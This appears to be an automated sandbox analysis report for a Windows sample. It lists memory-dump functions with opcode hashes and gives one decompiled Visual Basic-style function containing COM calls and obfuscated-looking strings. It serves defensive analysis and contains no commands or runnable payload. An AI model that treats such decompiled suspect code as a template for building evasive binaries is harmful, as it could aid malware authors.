Opcode ID: c2dd6156fea678feb24de324215f0bc59d5fd170d6f485b318c7403ae1b04053
Instruction ID: 3a6b225ec81ae72dfd7bc79f434b05f94da58cc7eac67d2f2d8a004cbf6b6d03
Opcode Fuzzy Hash: c2dd6156fea678feb24de324215f0bc59d5fd170d6f485b318c7403ae1b04053
Instruction Fuzzy Hash: 4FE14CB2544284AFEB214F749CE53CB7FA6EF8E320FA54059DD848B605D77D8981CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02AD2CDB, Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac94482c6864206a16f0ae6b80670db9f9fa5e8fb78cbe9747c620e942066d98
Instruction ID: 94eee230632603b460bcba53f426e279bfe827603aa91d22ef98e908260d6adc
Opcode Fuzzy Hash: ac94482c6864206a16f0ae6b80670db9f9fa5e8fb78cbe9747c620e942066d98
Instruction Fuzzy Hash: 7CE1DE71B007459FDB28CF28CD90BDAB7E6FF49360F594229EC5997280CB70A951CB80

Uniqueness

Uniqueness Score: -1.00%

Function 02AD2EA2, Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3a9d573789cdd1536b2392af8ce7b1d0fe076e437bb57f2de8dda92dbbb31d7
Instruction ID: cab19eda6ba335a13e7b498bf894d5e21cee4604f8acf1ac3f51a224011c6619
Opcode Fuzzy Hash: e3a9d573789cdd1536b2392af8ce7b1d0fe076e437bb57f2de8dda92dbbb31d7
Instruction Fuzzy Hash: C4C12772A44285DBEB258F24D8E57DBBBE5FF8A334F690199D8854BB45C73C8800CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02AD2DB3, Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a7a915a2544ab4969e9289d6824b5631e0a15611c7805549655ea7275a2ca1b
Instruction ID: 72a9f3ea1e460189c04125a8873981d4388f7f5d9610e6e01033489287a97965
Opcode Fuzzy Hash: 2a7a915a2544ab4969e9289d6824b5631e0a15611c7805549655ea7275a2ca1b
Instruction Fuzzy Hash: 9FC1CC716047469FDB28CF28CC94BEAB7E6FF49360F584229EC5987381DB30A951CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02AD281E, Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e68b0106469133dfd5d1dae2145de94299f9b2a3e81ca45df9aaf102a726710
Instruction ID: 29fb212b4ac2d38b0f0c29f623ca4f5baf7cf7dfc58a0862af484def3ce8f4d6
Opcode Fuzzy Hash: 5e68b0106469133dfd5d1dae2145de94299f9b2a3e81ca45df9aaf102a726710
Instruction Fuzzy Hash: 7091447164934A9FDB389E388C54BEE3BE6BF95300F15452EDC8AD7251DB318A42CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02AD2819, Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9049e5ad0a55e27c50f8e692d99252e5a665746cb6054c03d0a67edb04e68e3
Instruction ID: bd36a18994b4b9d547bfecad7fa2b61168d88d9f745fa2775866df79f3aad7b4
Opcode Fuzzy Hash: f9049e5ad0a55e27c50f8e692d99252e5a665746cb6054c03d0a67edb04e68e3
Instruction Fuzzy Hash: D671227164530A9FEB389E388D55BEF37A6AF95310F15852EEC8AD7250DB30C981CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02AD082F, Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 601092da2712bc7b16f56e26aaaf28b3f64ec972330f316a4f091fbc944c1210
Instruction ID: 1410dcaa59c78ed1af522366756294ef942537fcd82deef2d64ccd94bb8c347f
Opcode Fuzzy Hash: 601092da2712bc7b16f56e26aaaf28b3f64ec972330f316a4f091fbc944c1210
Instruction Fuzzy Hash: 926164A39981C1D6EB01573065F93DB7FA9DF9F278BBA409AC8850BA09C71D88019731

Uniqueness

Uniqueness Score: -1.00%

Function 02AD9069, Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e832d50020ec51526ef00fb5878d4bf182df68b35334cc277fd417cbc09e9480
Instruction ID: df8f554f1d9e35bd7726a0ea9579f36da4e0d09c1955d512a121253c947317ad
Opcode Fuzzy Hash: e832d50020ec51526ef00fb5878d4bf182df68b35334cc277fd417cbc09e9480
Instruction Fuzzy Hash: 616151639641859AEF155B3490F93CBBFA9DF8F138FBA0096C4814BE15D71EC8849721

Uniqueness

Uniqueness Score: -1.00%

Function 02AD0266, Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a990235577e4fad68b7ccb26ca255ae2ac8059440c62f643aad77d4ec978c32a
Instruction ID: 7621ed55002f5951a48580fd9057e23d4fe1e9b493b68f3acdd72a2af2080659
Opcode Fuzzy Hash: a990235577e4fad68b7ccb26ca255ae2ac8059440c62f643aad77d4ec978c32a
Instruction Fuzzy Hash: B06168938981C0A7EB12572455FA7CBBFA9CF8F274BBA00D6D8805BE0AD71D88019771

Uniqueness

Uniqueness Score: -1.00%

Function 02AD1CD8, Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d310041e7fe314e54c51e79f003c39ac6f5601512f1fdd4b4b16d4eae6cf8ea
Instruction ID: ef55a17b7c9ae2e5cff082af7fdb8bd9f90bd88e1f4cf95fbee3cf2e018c2c85
Opcode Fuzzy Hash: 6d310041e7fe314e54c51e79f003c39ac6f5601512f1fdd4b4b16d4eae6cf8ea
Instruction Fuzzy Hash: 2C51E5726402459FCF388E289DE5BEA37A7AF49790F56412EEC8EDB251C3314A86C705

Uniqueness

Uniqueness Score: -1.00%

Function 02AD61DB, Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dcd4e0ed782c01810bede0a36a0cccf5cd7b2266cb1e22e77d3cf3e06ee372a
Instruction ID: 2c2963e6225c74745741c3217ded1bb1a97f929444a84c26892477ab44d6bb89
Opcode Fuzzy Hash: 9dcd4e0ed782c01810bede0a36a0cccf5cd7b2266cb1e22e77d3cf3e06ee372a
Instruction Fuzzy Hash: 5C5141979981C596EB125B6051FA3CBBFA9DF8F234BB940D6C4814BE0AC71ECC40A771

Uniqueness

Uniqueness Score: -1.00%

Function 02AD3715, Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8fa85dfded33b45ba45e2a9863fba92b65d3e84057ee05624d6a31ca17f4b7
Instruction ID: 07863ccc4290393da28c536c66b33307122d33ef6c9e43698531976d18ce4df2
Opcode Fuzzy Hash: bd8fa85dfded33b45ba45e2a9863fba92b65d3e84057ee05624d6a31ca17f4b7
Instruction Fuzzy Hash: 687164711047028FDB19AF38C958BEAB7F2AF163A0F06425CDCD69B1A1CB759981CF42

Uniqueness

Uniqueness Score: -1.00%

Function 02AD01FC, Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 095e2b245579fee83f2ba50b23707a832a93a0c27a721be84bbdd1d80b527373
Instruction ID: cacbb40c05baa4a193fcdfe57b299ed8b84652674b2cbf0db179c3c152820e07
Opcode Fuzzy Hash: 095e2b245579fee83f2ba50b23707a832a93a0c27a721be84bbdd1d80b527373
Instruction Fuzzy Hash: 5F4186B1944305DFEB60AE788E557DB77F29F52380F45442EECC6A7104EB3488828B92

Uniqueness

Uniqueness Score: -1.00%

Function 02AD905A, Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1de6b8209d06518f7bcb84a264e053d3adb44c80fe70fb3016acc3ead73ebfad
Instruction ID: b5e1b89fb610c5cd8db0cd58742027aa0da5e3e15d333345ac26fbeffd009479
Opcode Fuzzy Hash: 1de6b8209d06518f7bcb84a264e053d3adb44c80fe70fb3016acc3ead73ebfad
Instruction Fuzzy Hash: 2F41E33161020A8EDF34AE78C5E83DBB6A7EF85324F96452ACC4787950EB31C4C9CA02

Uniqueness

Uniqueness Score: -1.00%

Function 02AD0341, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a84ca9dc4475489785800660a441f3f6b7d957f105da0604913f565b9e5a05d3
Instruction ID: bb6a86837990071407da29cba4287416f1b3ab19c0eae4d7ad76d05c9eec1a63
Opcode Fuzzy Hash: a84ca9dc4475489785800660a441f3f6b7d957f105da0604913f565b9e5a05d3
Instruction Fuzzy Hash: 0341A9B5584345CFEB11EF798A443CB7BF29F46380F49846EDC85AB105DB3489438BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02AD29C3, Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 031402b590f011df3a1a4ccb8cf45a17c2522157f772e897e57a309e1cf54b61
Instruction ID: e7a0dd3f04502f322a3d9cab9897e3fd4fc5264dea83c5f141580f70ad10a28d
Opcode Fuzzy Hash: 031402b590f011df3a1a4ccb8cf45a17c2522157f772e897e57a309e1cf54b61
Instruction Fuzzy Hash: DE41013124834A9FDB389E388D55BEF37E6AF95750F14441EEC8AD7211DB718A41CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02AD63BD, Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 762a00481ea88c81e3954732033f38b40b05aaeaaa00ea1bc901a9ad55c14581
Instruction ID: fad27c8b9a3b934dc5b0f859b35ba27d4cee3b3746f456924c9e0691933b8fa9
Opcode Fuzzy Hash: 762a00481ea88c81e3954732033f38b40b05aaeaaa00ea1bc901a9ad55c14581
Instruction Fuzzy Hash: 4B3155B5A44355DFEF34AF68AEA07DD3A62AF04360F904029EC0F97240DB718E808B52

Uniqueness

Uniqueness Score: -1.00%

Function 02AD78E5, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd0b17fabe43ff92eb842812e908341871063cdb41999bc1a673f2cd0afcfa0a
Instruction ID: b7b8e9c617d2edcfe3f7660c530f8f45f05650665228ab2cc183ee4b75d41ccc
Opcode Fuzzy Hash: fd0b17fabe43ff92eb842812e908341871063cdb41999bc1a673f2cd0afcfa0a
Instruction Fuzzy Hash: 6E21B5B57442159FDF39EF68DDD0BEDB7A69F18320FA14429E80ACB605DB3199C0CA12

Uniqueness

Uniqueness Score: -1.00%

Function 02AD2A6A, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11b9e0459dc831e291e4022ab36a071175393d670710d11975536a045be2081a
Instruction ID: 005122f33e40018e7b7659990efcbe194195b5167cd423f40a39f37291cfa7a0
Opcode Fuzzy Hash: 11b9e0459dc831e291e4022ab36a071175393d670710d11975536a045be2081a
Instruction Fuzzy Hash: 82212836298306DFCB689E788A457EF3BE5AF51740F01441DEC8AD7211D7618A81CB12

Uniqueness

Uniqueness Score: -1.00%

Function 02AD3EBF, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f255fb9a882dc0cc32369909164520855eb6a0f283184c8b3406a2ca6628bec
Instruction ID: bcf5a986247f82ebb125459f0792a8af6e3119b3d1b82aec6a3cf4b1add776bc
Opcode Fuzzy Hash: 7f255fb9a882dc0cc32369909164520855eb6a0f283184c8b3406a2ca6628bec
Instruction Fuzzy Hash: 43112972544382CFEB604EB8CD993C77BE5AF55750F46042E9C89AB204D3348A428B57

Uniqueness

Uniqueness Score: -1.00%

Function 02AD517B, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aaa24b323300d083d41a7a4498758a16113a776b46b07348bec8fff3125399b
Instruction ID: 7c69e474b6da4e30abd81b1bc4d68bb999028c4e2db59828fef888510c8d8094
Opcode Fuzzy Hash: 6aaa24b323300d083d41a7a4498758a16113a776b46b07348bec8fff3125399b
Instruction Fuzzy Hash: 0DB092B62026808FFB41CF08C591B0073A0FB01AC8F080490E442CF712D224E900CA00

Uniqueness

Uniqueness Score: -1.00%

Function 02AD741C, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 0042EC3E, Relevance: 109.0, APIs: 58, Strings: 4, Instructions: 464
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0042EC3E(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v80;
				char _v84;
				char _v88;
				void* _t105;
				intOrPtr* _t106;
				void* _t107;
				void* _t109;
				intOrPtr* _t110;
				void* _t111;
				intOrPtr* _t115;
				intOrPtr* _t117;
				void* _t119;
				char* _t120;
				char* _t121;
				intOrPtr* _t128;
				intOrPtr* _t130;
				void* _t132;
				intOrPtr _t133;
				void* _t135;
				intOrPtr* _t136;
				void* _t137;
				intOrPtr* _t138;
				intOrPtr* _t140;
				void* _t142;
				void* _t144;
				intOrPtr* _t145;
				void* _t146;
				char* _t149;
				char* _t150;
				void* _t151;
				void* _t153;
				intOrPtr* _t154;
				void* _t155;
				void* _t157;
				intOrPtr* _t158;
				void* _t159;
				char* _t160;
				void* _t161;
				intOrPtr* _t163;
				void* _t210;
				intOrPtr* _t212;
				intOrPtr* _t213;
				intOrPtr* _t214;
				intOrPtr* _t215;
				intOrPtr* _t217;
				intOrPtr* _t219;
				intOrPtr* _t220;
				intOrPtr* _t221;
				intOrPtr* _t222;
				intOrPtr* _t223;
				intOrPtr* _t224;
				intOrPtr* _t225;
				intOrPtr* _t226;
				intOrPtr* _t227;
				intOrPtr* _t228;
				intOrPtr* _t229;
				intOrPtr* _t230;
				intOrPtr _t233;
				intOrPtr _t238;

				_push(0x4011b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t233;
				_v12 = _t233 - 0x68;
				_v8 = E00401198;
				_t238 =  *0x430340; // 0x218e8b4
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v56 = 0;
				_v60 = 0;
				_v64 = 0;
				_v80 = 0;
				_v84 = 0;
				_v88 = 0;
				_t163 = 0x430340;
				if(_t238 == 0) {
					_push(0x430340);
					_push(0x42af8c);
					L0040130C();
				}
				_t212 =  *0x430340; // 0x218e8b4
				_t105 =  *((intOrPtr*)( *_t212 + 0x14))(_t212,  &_v60);
				asm("fclex");
				if(_t105 >= 0) {
					_t210 = 0x42b13c;
				} else {
					_push(0x14);
					_t210 = 0x42b13c;
					_push(0x42b13c);
					_push(_t212);
					_push(_t105);
					L00401306();
				}
				_t106 = _v60;
				_t213 = _t106;
				_t107 =  *((intOrPtr*)( *_t106 + 0xc8))(_t106,  &_v84);
				asm("fclex");
				if(_t107 < 0) {
					_push(0xc8);
					_push(0x42ac4c);
					_push(_t213);
					_push(_t107);
					L00401306();
				}
				L00401300();
				if( *0x430340 == 0) {
					_push(_t163);
					_push(0x42af8c);
					L0040130C();
				}
				_t214 =  *0x430340; // 0x218e8b4
				_t109 =  *((intOrPtr*)( *_t214 + 0x14))(_t214,  &_v60);
				asm("fclex");
				if(_t109 < 0) {
					_push(0x14);
					_push(_t210);
					_push(_t214);
					_push(_t109);
					L00401306();
				}
				_t110 = _v60;
				_t215 = _t110;
				_t111 =  *((intOrPtr*)( *_t110 + 0x100))(_t110,  &_v88);
				asm("fclex");
				if(_t111 < 0) {
					_push(0x100);
					_push(0x42ac4c);
					_push(_t215);
					_push(_t111);
					L00401306();
				}
				L00401300();
				if( ~(0 | _v88 != 0x00400000) != 0) {
					if( *0x430340 == 0) {
						_push(_t163);
						_push(0x42af8c);
						L0040130C();
					}
					_t226 =  *0x430340; // 0x218e8b4
					_t153 =  *((intOrPtr*)( *_t226 + 0x14))(_t226,  &_v60);
					asm("fclex");
					if(_t153 < 0) {
						_push(0x14);
						_push(_t210);
						_push(_t226);
						_push(_t153);
						L00401306();
					}
					_t154 = _v60;
					_t227 = _t154;
					_t155 =  *((intOrPtr*)( *_t154 + 0xd0))(_t154,  &_v48);
					asm("fclex");
					if(_t155 < 0) {
						_push(0xd0);
						_push(0x42ac4c);
						_push(_t227);
						_push(_t155);
						L00401306();
					}
					_v48 = _v48 & 0x00000000;
					L004012CA();
					L00401300();
					if( *0x430340 == 0) {
						_push(_t163);
						_push(0x42af8c);
						L0040130C();
					}
					_t228 =  *0x430340; // 0x218e8b4
					_t157 =  *((intOrPtr*)( *_t228 + 0x14))(_t228,  &_v60);
					asm("fclex");
					if(_t157 < 0) {
						_push(0x14);
						_push(_t210);
						_push(_t228);
						_push(_t157);
						L00401306();
					}
					_t158 = _v60;
					_t229 = _t158;
					_t159 =  *((intOrPtr*)( *_t158 + 0x58))(_t158,  &_v48);
					asm("fclex");
					if(_t159 < 0) {
						_push(0x58);
						_push(0x42ac4c);
						_push(_t229);
						_push(_t159);
						L00401306();
					}
					_v48 = _v48 & 0x00000000;
					L004012CA();
					L00401300();
					if( *0x430340 == 0) {
						_push(0x430340);
						_push(0x42af8c);
						L0040130C();
					}
					_t230 =  *0x430340; // 0x218e8b4
					L00401246();
					_t160 =  &_v60;
					L00401312();
					_t161 =  *((intOrPtr*)( *_t230 + 0x40))(_t230, _t160, _t160, _t159, _v32, 0x42b348, L"erantissen");
					asm("fclex");
					if(_t161 < 0) {
						_push(0x40);
						_push(_t210);
						_push(_t230);
						_push(_t161);
						L00401306();
					}
					L00401300();
					_t163 = 0x430340;
				}
				_t115 =  *0x430010; // 0x4df9f8
				if(_t115 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t115 =  *0x430010; // 0x4df9f8
				}
				_t117 =  &_v60;
				L00401312();
				_t217 = _t117;
				_t119 =  *((intOrPtr*)( *_t217 + 0x158))(_t217,  &_v48, _t117,  *((intOrPtr*)( *_t115 + 0x32c))(_t115));
				asm("fclex");
				if(_t119 < 0) {
					_push(0x158);
					_push(0x42b0fc);
					_push(_t217);
					_push(_t119);
					L00401306();
				}
				_push(0);
				_push(_v48);
				_t120 =  &_v56;
				_push(_t120);
				L004012FA();
				_push(_t120);
				_push(L"Belj");
				_t121 =  &_v52;
				_push(_t121);
				L004012FA();
				_push(_t121);
				E0042AE50();
				_v88 = _t121;
				L004012F4();
				_push( &_v56);
				_push( &_v48);
				_push( &_v52);
				_push(3);
				L004012EE();
				L00401300();
				if( ~(0 | _v88 == 0x00000379) != 0) {
					if( *0x430340 == 0) {
						_push(_t163);
						_push(0x42af8c);
						L0040130C();
					}
					_t220 =  *0x430340; // 0x218e8b4
					_t135 =  *((intOrPtr*)( *_t220 + 0x14))(_t220,  &_v60);
					asm("fclex");
					if(_t135 < 0) {
						_push(0x14);
						_push(_t210);
						_push(_t220);
						_push(_t135);
						L00401306();
					}
					_t136 = _v60;
					_t221 = _t136;
					_t137 =  *((intOrPtr*)( *_t136 + 0x138))(_t136, L"Hjerneskade2", 1);
					asm("fclex");
					if(_t137 < 0) {
						_push(0x138);
						_push(0x42ac4c);
						_push(_t221);
						_push(_t137);
						L00401306();
					}
					L00401300();
					_t138 =  *0x430010; // 0x4df9f8
					if(_t138 == 0) {
						_push(0x430010);
						_push(0x42a01c);
						L0040130C();
						_t138 =  *0x430010; // 0x4df9f8
					}
					_t140 =  &_v60;
					L00401312();
					_t222 = _t140;
					_t142 =  *((intOrPtr*)( *_t222 + 0x238))(_t222,  &_v48, _t140,  *((intOrPtr*)( *_t138 + 0x330))(_t138));
					asm("fclex");
					if(_t142 < 0) {
						_push(0x238);
						_push(0x42b0fc);
						_push(_t222);
						_push(_t142);
						L00401306();
					}
					if( *0x430340 == 0) {
						_push(_t163);
						_push(0x42af8c);
						L0040130C();
					}
					_t223 =  *0x430340; // 0x218e8b4
					_t144 =  *((intOrPtr*)( *_t223 + 0x14))(_t223,  &_v64);
					asm("fclex");
					if(_t144 < 0) {
						_push(0x14);
						_push(_t210);
						_push(_t223);
						_push(_t144);
						L00401306();
					}
					_t145 = _v64;
					_t224 = _t145;
					_t146 =  *((intOrPtr*)( *_t145 + 0x138))(_t145, _v48, 1);
					asm("fclex");
					if(_t146 < 0) {
						_push(0x138);
						_push(0x42ac4c);
						_push(_t224);
						_push(_t146);
						L00401306();
					}
					L004012E2();
					_push( &_v64);
					_push( &_v60);
					_push(2);
					L004012E8();
					if( *0x430340 == 0) {
						_push(0x430340);
						_push(0x42af8c);
						L0040130C();
					}
					_t225 =  *0x430340; // 0x218e8b4
					_t149 =  &_v80;
					L004012D0();
					L004012D6();
					_t150 =  &_v60;
					L004012DC();
					_t151 =  *((intOrPtr*)( *_t225 + 0xc))(_t225, _t150, _t150, _t149, _t149, _t149, _v40, L"L5kppEjAHuXwB01I3FcVsAcOnr6ZrARmCtewD172", 0);
					asm("fclex");
					if(_t151 < 0) {
						_push(0xc);
						_push(_t210);
						_push(_t225);
						_push(_t151);
						L00401306();
					}
					L00401300();
					L0040131E();
				}
				_t128 =  *0x430010; // 0x4df9f8
				if(_t128 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t128 =  *0x430010; // 0x4df9f8
				}
				_t130 =  &_v60;
				L00401312();
				_t219 = _t130;
				_t132 =  *((intOrPtr*)( *_t219 + 0x168))(_t219,  &_v84, _t130,  *((intOrPtr*)( *_t128 + 0x330))(_t128));
				asm("fclex");
				if(_t132 < 0) {
					_push(0x168);
					_push(0x42b0fc);
					_push(_t219);
					_push(_t132);
					L00401306();
				}
				_t133 = _v84;
				_v24 = _t133;
				L00401300();
				_push(0x42f1d4);
				L00401300();
				L004012E2();
				L00401300();
				L004012E2();
				return _t133;
			}

0x0042ec43
0x0042ec4e
0x0042ec4f
0x0042ec5c
0x0042ec5f
0x0042ec68
0x0042ec6e
0x0042ec71
0x0042ec74
0x0042ec77
0x0042ec7a
0x0042ec7d
0x0042ec80
0x0042ec83
0x0042ec86
0x0042ec89
0x0042ec8c
0x0042ec8f
0x0042ec92
0x0042ec97
0x0042ec99
0x0042ec9a
0x0042ec9f
0x0042ec9f
0x0042eca4
0x0042ecb1
0x0042ecb4
0x0042ecb8
0x0042eccb
0x0042ecba
0x0042ecba
0x0042ecbc
0x0042ecc1
0x0042ecc2
0x0042ecc3
0x0042ecc4
0x0042ecc4
0x0042ecd0
0x0042ecda
0x0042ecdc
0x0042ece2
0x0042ece6
0x0042ece8
0x0042eced
0x0042ecf2
0x0042ecf3
0x0042ecf4
0x0042ecf4
0x0042ecfc
0x0042ed08
0x0042ed0a
0x0042ed0b
0x0042ed10
0x0042ed10
0x0042ed15
0x0042ed22
0x0042ed25
0x0042ed29
0x0042ed2b
0x0042ed2d
0x0042ed2e
0x0042ed2f
0x0042ed30
0x0042ed30
0x0042ed35
0x0042ed3f
0x0042ed41
0x0042ed47
0x0042ed4b
0x0042ed4d
0x0042ed52
0x0042ed57
0x0042ed58
0x0042ed59
0x0042ed59
0x0042ed72
0x0042ed7a
0x0042ed87
0x0042ed89
0x0042ed8a
0x0042ed8f
0x0042ed8f
0x0042ed94
0x0042eda1
0x0042eda4
0x0042eda8
0x0042edaa
0x0042edac
0x0042edad
0x0042edae
0x0042edaf
0x0042edaf
0x0042edb4
0x0042edbe
0x0042edc0
0x0042edc6
0x0042edca
0x0042edcc
0x0042edd1
0x0042edd6
0x0042edd7
0x0042edd8
0x0042edd8
0x0042ede0
0x0042ede7
0x0042edef
0x0042edfb
0x0042edfd
0x0042edfe
0x0042ee03
0x0042ee03
0x0042ee08
0x0042ee15
0x0042ee18
0x0042ee1c
0x0042ee1e
0x0042ee20
0x0042ee21
0x0042ee22
0x0042ee23
0x0042ee23
0x0042ee28
0x0042ee32
0x0042ee34
0x0042ee37
0x0042ee3b
0x0042ee3d
0x0042ee3f
0x0042ee44
0x0042ee45
0x0042ee46
0x0042ee46
0x0042ee4e
0x0042ee55
0x0042ee5d
0x0042ee69
0x0042ee6b
0x0042ee70
0x0042ee75
0x0042ee75
0x0042ee7a
0x0042ee8f
0x0042ee95
0x0042ee99
0x0042eea0
0x0042eea3
0x0042eea7
0x0042eea9
0x0042eeab
0x0042eeac
0x0042eead
0x0042eeae
0x0042eeae
0x0042eeb6
0x0042eebb
0x0042eebb
0x0042eec0
0x0042eec7
0x0042eec9
0x0042eece
0x0042eed3
0x0042eed8
0x0042eed8
0x0042eee7
0x0042eeeb
0x0042eef3
0x0042eef9
0x0042eeff
0x0042ef03
0x0042ef05
0x0042ef0a
0x0042ef0f
0x0042ef10
0x0042ef11
0x0042ef11
0x0042ef16
0x0042ef18
0x0042ef1b
0x0042ef1e
0x0042ef1f
0x0042ef24
0x0042ef25
0x0042ef2a
0x0042ef2d
0x0042ef2e
0x0042ef33
0x0042ef34
0x0042ef39
0x0042ef3c
0x0042ef55
0x0042ef59
0x0042ef5d
0x0042ef5e
0x0042ef60
0x0042ef6b
0x0042ef73
0x0042ef80
0x0042ef82
0x0042ef83
0x0042ef88
0x0042ef88
0x0042ef8d
0x0042ef9a
0x0042ef9d
0x0042efa1
0x0042efa3
0x0042efa5
0x0042efa6
0x0042efa7
0x0042efa8
0x0042efa8
0x0042efad
0x0042efba
0x0042efbc
0x0042efc2
0x0042efc6
0x0042efc8
0x0042efcd
0x0042efd2
0x0042efd3
0x0042efd4
0x0042efd4
0x0042efdc
0x0042efe1
0x0042efe8
0x0042efea
0x0042efef
0x0042eff4
0x0042eff9
0x0042eff9
0x0042f008
0x0042f00c
0x0042f014
0x0042f01a
0x0042f020
0x0042f024
0x0042f026
0x0042f02b
0x0042f030
0x0042f031
0x0042f032
0x0042f032
0x0042f03e
0x0042f040
0x0042f041
0x0042f046
0x0042f046
0x0042f04b
0x0042f058
0x0042f05b
0x0042f05f
0x0042f061
0x0042f063
0x0042f064
0x0042f065
0x0042f066
0x0042f066
0x0042f06b
